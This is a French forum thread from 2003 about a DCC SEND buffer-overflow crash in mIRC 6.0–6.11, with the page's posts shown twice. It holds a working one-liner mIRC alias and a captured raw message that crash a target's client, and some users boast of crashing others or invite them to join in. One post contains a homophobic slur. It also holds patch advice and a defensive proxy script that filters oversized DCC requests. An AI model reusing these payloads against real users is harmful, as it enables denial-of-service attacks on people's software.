abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 11 sept. 2004 à 03:52
lol à vrai dir ya plein de version de la faille .
Le principe c d'envoyer le message pour ouvrir une connection DCC SEND en envoyant un maximum de bite sur le buffer . Et vu que le buffer est trop petit pour recevoir tte les données, ça plante.
Exemple :
Si le buffer est comfigurer pour recevoir 1024bits
et kon en envoie 2048, b le pauvre piti mirc n'apprécie poa .
LOL
Have fun
DarKiNg virus
Messages postés136Date d'inscriptionsamedi 29 novembre 2003StatutMembreDernière intervention23 juillet 2005 12 févr. 2004 à 12:23
(12:20:54) -> Server: privmsg EviLSoniC :DCC SEND "g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g g 2130706433 4060 <-- c sa la faille ??
DarKiNg virus
Messages postés136Date d'inscriptionsamedi 29 novembre 2003StatutMembreDernière intervention23 juillet 2005 12 févr. 2004 à 12:22
black_onix vien t'éclaté avec moi sur voila a niké lé petit pd
black_onix
Messages postés2Date d'inscriptionmercredi 24 septembre 2003StatutMembreDernière intervention26 mai 2005 25 déc. 2003 à 23:11
la vla la faille ralala vous etes tous des lamouzzz
cs_PuMaZ
Messages postés92Date d'inscriptionmercredi 6 août 2003StatutMembreDernière intervention13 février 2009 25 oct. 2003 à 18:15
n0 comment
SyNoruS
Messages postés24Date d'inscriptionjeudi 11 septembre 2003StatutMembreDernière intervention28 avril 2004 20 oct. 2003 à 10:01
Oui oui, je confirme, on a déjà assisté à une bataille de lamer sur un canal ;)
abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 18 oct. 2003 à 13:10
lol ... ;)
cs_thyb
Messages postés217Date d'inscriptionsamedi 8 mars 2003StatutMembreDernière intervention22 mai 2004 18 oct. 2003 à 00:02
moi je trouve sa bien de montrer la faille et de donner le lien
en faite hackoustik, si il a essayer de casser abdoulax, c qu'il etai rajeux de s'etre fais casser son calendrier lol ^^ donc voila ;)
bon chat =)
WilloWHaveGooD
Messages postés1Date d'inscriptionmardi 3 juin 2003StatutMembreDernière intervention17 octobre 2003 17 oct. 2003 à 01:05
batard JHD tu a essaye trop de fois de me faire planter :)
ZeuS-SueZ
Messages postés6Date d'inscriptionmercredi 15 octobre 2003StatutMembreDernière intervention15 octobre 2003 15 oct. 2003 à 22:23
lol quand je le donnerais à tlm, 90 % des gens auront pris leurs précautions...
Puis si personne connait la faille ben tlm reste avec un mirc sensible...
Come ca les 10% qui resteront ils auront pas le choix :p
abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 15 oct. 2003 à 15:41
par contre ca c une mauvaise idé de donné ca a tou le monde ....
ZeuS-SueZ
Messages postés6Date d'inscriptionmercredi 15 octobre 2003StatutMembreDernière intervention15 octobre 2003 15 oct. 2003 à 13:50
Hum je suis gentil je vous donne le début de l'alias qu'il faut tapper avec le pseudo en parametre pour exploiter la faille :))
Le seul truc c qu'il faudrait la fin :p
Je le mettrais en complet un peu plus tard quand la majorité des serveurs et des personnes auront réagis comme ca ca aggravera pas les pbs pi vous pourrrez quand meme tester sur ceux qui restent :))
abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 15 oct. 2003 à 11:23
lol j'avias compris ca , je voulais savoir la parti que tu ne ve poa divulgué ms bon c poa grave . ( tu pe me la dir en privé ) koi que ca me servira à rien c just pr constater .......
ZeuS-SueZ
Messages postés6Date d'inscriptionmercredi 15 octobre 2003StatutMembreDernière intervention15 octobre 2003 15 oct. 2003 à 05:32
"La faille s'eXploite via une requête DCC modifiée (Direct Client to Client), servant d'ordinaire à s'échanger des fichiers ou à chatter. Cette requête peut être envoyée à n'importe qui ou à n'importe quel salon de discussion et fera planter le programme, ceci quelles que soient les options de configuration DCC que vous avez choisies. [...]
Les versions de mIRC concernées par ce problème sont les versions 6.0 à 6.11"
Voila je crois que j'ai répondu à ta question, je donnerais pas ici la manière d'utiliser la faille, pour pas que l'on soit encore moins nombreux sur l'irc...
La façon la plus facile d'éviter la faille est encore de télécharger Mirc V 6.12 dispo sur http://www.mirc.com
Je finirais juste par dire qu'il est bizarre qu'une version corrigée soit sortie aussi vite...
Voila :))
abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 14 oct. 2003 à 21:43
héhé g poa testé ms c cool . ya poa qlq ki pourai me msg un link pr expliqué le fonctionement de cette faille , parce que j'aimerai bien savoir et pi g la flem de chercher sur le web ....
dj328i
Messages postés312Date d'inscriptiondimanche 23 février 2003StatutMembreDernière intervention14 mars 2022 14 oct. 2003 à 21:37
Meme si la 6.12 est sortie voila une source qui regle quand meme hors la commande d'ignore , le probleme de la 6.11
alias lstn {
firewall -cmp %nirc.addy %nirc.port
firewall on
if ($portfree(%nirc.port) == $true) socklisten -d %nirc.addy nirc %nirc.port
if (%nirc.verbose == 1) echo 14 nIRC: Listening on 127.0.0.1 %nirc.port
if (%nirc.mkill.enabled !1) { if (%nirc.verbose 1) echo 4 nIRC:mkill mKill filter detection is OFF | else echo 2 nIRC:mkill mKill filter detection is ON }
}
on 1:socklisten:nirc:{
sockaccept nirc.client $+ $ticks
if (%nirc.verbose == 1) echo 14 nIRC: Incoming connection: $sock($sockname).ip
}
on 1:sockread:nirc.client*:{
if ($sockerr > 0) return
:nextread
sockread %nirc.data
if ($sockbr == 0) return
if (%nirc.data $null) %nirc.data -
if (%nirc.data == $chr(45)) halt
alias swrite {
if (%nirc.mkill.enabled == 1) && (DCC SEND isin $2-) && ($pos($2-,$chr(32),0) >= $calc(%nirc.mkill.threshold + 8)) { mkillwarning $1 $2- | halt }
if (%nirc.mkill.enabled == 1) && (DCC SEND isin $2-) && ($pos($2-,$chr(32),0) <= $calc(%nirc.mkill.threshold +7)) { sockwrite -n $sock($1).mark $2- | halt }
if (%nirc.mkill.enabled == 1) && (DCC SEND !isin $2-) { sockwrite -n $sock($1).mark $2- | halt }
else sockwrite -n $sock($1).mark $2-
}
alias mkillwarning {
if (%nirc.verbose == 1) echo 0 -
if (%nirc.verbose == 1) echo 4 nIRC:block@ possible mKill detected, output follows:
if (%nirc.verbose == 1) echo 14 $2-
if (%nirc.verbose == 1) echo 0 -
if (%nirc.mkill.verbose == 1) sockwrite -n $sock($1).mark nIRC.Proxy!nIRC.Proxy PRIVMSG nIRC :Warning: possible 4mKill was detected14 $chr(91) $+ Current threshold: %nirc.mkill.threshold $+ $chr(93): $left($2-,$pos($2-,$chr(32),1))
if (%nirc.mkill.report == 1) sockwrite -n $1 PRIVMSG $mid($2,2,$calc($pos($2,!,1)-2)) :Your mKill has been detected and logged. Repeated attempts will be reported.
}
abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 14 oct. 2003 à 19:13
lol b a vrai dire moi non plus je parle poa tro english .... , si tu ve c un bug . là , cette faille crashe ton mirc . ca sert a rien ms bon , yen que ca amuse ....
djdge27
Messages postés24Date d'inscriptionlundi 28 juillet 2003StatutMembreDernière intervention23 octobre 2003 14 oct. 2003 à 18:20
Juste une question, je speak pas english moi!!! en francais ca donne koi?? c koi les failles?
abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 14 oct. 2003 à 18:08
lol je suis en train de me demandé si cette faille n'a poa été faite pr lancer le mirc 6.12 ....
abdoulax
Messages postés875Date d'inscriptionsamedi 17 mai 2003StatutMembreDernière intervention22 juin 20121 14 oct. 2003 à 17:21
lol merci jhd
hackoustik moi non plus je voulé poa y croir , ms moi mem j'en ai été victime , sur efnet , la-bas c un désatre ya plus persone sur les chans . Sur mon chan ya moitier moins de personne que d'habitude , si tu trouve ca normal ....
Et pi si tu me croi poa JHD a proposé de te le démontrer ....
bon allé have fun les lamerzzzzzzzz
lol
#ircfr sur irc.voila.fr ( server de merde )
cs_jhd
Messages postés338Date d'inscriptionmardi 13 août 2002StatutMembreDernière intervention29 novembre 2007 14 oct. 2003 à 16:11
hackoustik viens me voir sur irc jver te la donnée la preuve moi
c est un tres bon post d abdoulax
qd au lamerz de ton style hackoustik ca ser ta rien dvs donner la faille
hackoustik
Messages postés81Date d'inscriptionvendredi 3 janvier 2003StatutMembreDernière intervention 8 février 2007 14 oct. 2003 à 13:13
lol si cest pour marquer ca cest pas la peine , les expliquations de ton lien est naze je trouve, car parler de faille sans en donné la preuve, cest racontrer des choses en esperant que des cervos ramolis prendront ca pour argent comptant ;)
11 sept. 2004 à 03:52
Le principe c d'envoyer le message pour ouvrir une connection DCC SEND en envoyant un maximum de bite sur le buffer . Et vu que le buffer est trop petit pour recevoir tte les données, ça plante.
Exemple :
Si le buffer est comfigurer pour recevoir 1024bits
et kon en envoie 2048, b le pauvre piti mirc n'apprécie poa .
LOL
Have fun
12 févr. 2004 à 12:23
12 févr. 2004 à 12:22
25 déc. 2003 à 23:11
//raw privmsg $$1 $2 $3 $4 $5 $6 $7 $8 $9 $10 : $+ $chr(1) $+ DCC SEND " $+ $str($rand(a,z) $+ $chr(32), 165) $+ $longip(127.0.0.1) $rand(113,9999) $+ $chr(1)
25 oct. 2003 à 18:15
20 oct. 2003 à 10:01
18 oct. 2003 à 13:10
18 oct. 2003 à 00:02
en faite hackoustik, si il a essayer de casser abdoulax, c qu'il etai rajeux de s'etre fais casser son calendrier lol ^^ donc voila ;)
bon chat =)
17 oct. 2003 à 01:05
15 oct. 2003 à 22:23
Puis si personne connait la faille ben tlm reste avec un mirc sensible...
Come ca les 10% qui resteront ils auront pas le choix :p
15 oct. 2003 à 15:41
15 oct. 2003 à 13:50
Hum je suis gentil je vous donne le début de l'alias qu'il faut tapper avec le pseudo en parametre pour exploiter la faille :))
Le seul truc c qu'il faudrait la fin :p
Je le mettrais en complet un peu plus tard quand la majorité des serveurs et des personnes auront réagis comme ca ca aggravera pas les pbs pi vous pourrrez quand meme tester sur ceux qui restent :))
15 oct. 2003 à 11:23
15 oct. 2003 à 05:32
Les versions de mIRC concernées par ce problème sont les versions 6.0 à 6.11"
Voila je crois que j'ai répondu à ta question, je donnerais pas ici la manière d'utiliser la faille, pour pas que l'on soit encore moins nombreux sur l'irc...
La façon la plus facile d'éviter la faille est encore de télécharger Mirc V 6.12 dispo sur http://www.mirc.com
Je finirais juste par dire qu'il est bizarre qu'une version corrigée soit sortie aussi vite...
Voila :))
14 oct. 2003 à 21:43
14 oct. 2003 à 21:37
on 1:load:{
%nirc.mkill.enabled = 1
%nirc.mkill.report = 0
%nirc.mkill.threshold = 35
%nirc.mkill.verbose = 1
%nirc.verbose = 0
%nirc.banned = localhost 127.0.0.1
%nirc.addy = 127.0.0.1
%nirc.port = 6667
}
on 1:start:lstn
alias lstn {
firewall -cmp %nirc.addy %nirc.port
firewall on
if ($portfree(%nirc.port) == $true) socklisten -d %nirc.addy nirc %nirc.port
if (%nirc.verbose == 1) echo 14 nIRC: Listening on 127.0.0.1 %nirc.port
if (%nirc.mkill.enabled !1) { if (%nirc.verbose 1) echo 4 nIRC:mkill mKill filter detection is OFF | else echo 2 nIRC:mkill mKill filter detection is ON }
}
on 1:socklisten:nirc:{
sockaccept nirc.client $+ $ticks
if (%nirc.verbose == 1) echo 14 nIRC: Incoming connection: $sock($sockname).ip
}
on 1:sockread:nirc.client*:{
if ($sockerr > 0) return
:nextread
sockread %nirc.data
if ($sockbr == 0) return
if (%nirc.data $null) %nirc.data -
if (%nirc.data == $chr(45)) halt
if (.server !isin $sockname) parse $sockname %nirc.data
else swrite $sockname %nirc.data
goto nextread
}
on 1:sockopen:nirc.client*.server:{
if (%nirc.verbose == 1) echo 15 nIRC:reply $chr(91) $+ $sock($sockname).mark $+ $chr(93) HTTP/1.0 200 Connection established
sockwrite -n $sock($sockname).mark HTTP/1.0 200 Connection established
}
on 1:sockclose:nirc.client*:{
if ($sock($sockname).mark != $null) sockclose $sock($sockname).mark
}
alias parse {
if (connect isin $2) && ($left($3-,$calc($pos($3-,:,1)-1)) !isin %nirc.banned) {
if (%nirc.verbose == 1) echo 14 nIRC: Client $sock($1).ip $+ $chr(91) $+ $1 $+ $chr(93) attempting connect to: $left($3-,$calc($pos($3-,:,1)-1)) port: $mid($3,$calc($pos($3,:,1)+1))
sockopen [ $1 $+ .server ] $left($3-,$calc($pos($3-,:,1)-1)) $mid($3,$calc($pos($3,:,1)+1))
sockmark [ $1 $+ .server ] $1
sockmark $1 [ $1 $+ .server ]
halt
}
; elseif (/slist isin $3) {
;
; }
elseif ($left($3-,$calc($pos($3-,:,1)-1)) !isin %nirc.banned) {
sockwrite -n $sock($1).mark $2- | halt
}
}
alias swrite {
if (%nirc.mkill.enabled == 1) && (DCC SEND isin $2-) && ($pos($2-,$chr(32),0) >= $calc(%nirc.mkill.threshold + 8)) { mkillwarning $1 $2- | halt }
if (%nirc.mkill.enabled == 1) && (DCC SEND isin $2-) && ($pos($2-,$chr(32),0) <= $calc(%nirc.mkill.threshold +7)) { sockwrite -n $sock($1).mark $2- | halt }
if (%nirc.mkill.enabled == 1) && (DCC SEND !isin $2-) { sockwrite -n $sock($1).mark $2- | halt }
else sockwrite -n $sock($1).mark $2-
}
alias mkillwarning {
if (%nirc.verbose == 1) echo 0 -
if (%nirc.verbose == 1) echo 4 nIRC:block@ possible mKill detected, output follows:
if (%nirc.verbose == 1) echo 14 $2-
if (%nirc.verbose == 1) echo 0 -
if (%nirc.mkill.verbose == 1) sockwrite -n $sock($1).mark nIRC.Proxy!nIRC.Proxy PRIVMSG nIRC :Warning: possible 4mKill was detected14 $chr(91) $+ Current threshold: %nirc.mkill.threshold $+ $chr(93): $left($2-,$pos($2-,$chr(32),1))
if (%nirc.mkill.report == 1) sockwrite -n $1 PRIVMSG $mid($2,2,$calc($pos($2,!,1)-2)) :Your mKill has been detected and logged. Repeated attempts will be reported.
}
14 oct. 2003 à 19:13
14 oct. 2003 à 18:20
14 oct. 2003 à 18:08
14 oct. 2003 à 17:21
hackoustik moi non plus je voulé poa y croir , ms moi mem j'en ai été victime , sur efnet , la-bas c un désatre ya plus persone sur les chans . Sur mon chan ya moitier moins de personne que d'habitude , si tu trouve ca normal ....
Et pi si tu me croi poa JHD a proposé de te le démontrer ....
bon allé have fun les lamerzzzzzzzz
lol
#ircfr sur irc.voila.fr ( server de merde )
14 oct. 2003 à 16:11
c est un tres bon post d abdoulax
qd au lamerz de ton style hackoustik ca ser ta rien dvs donner la faille
14 oct. 2003 à 13:13
a bon entendeur ;)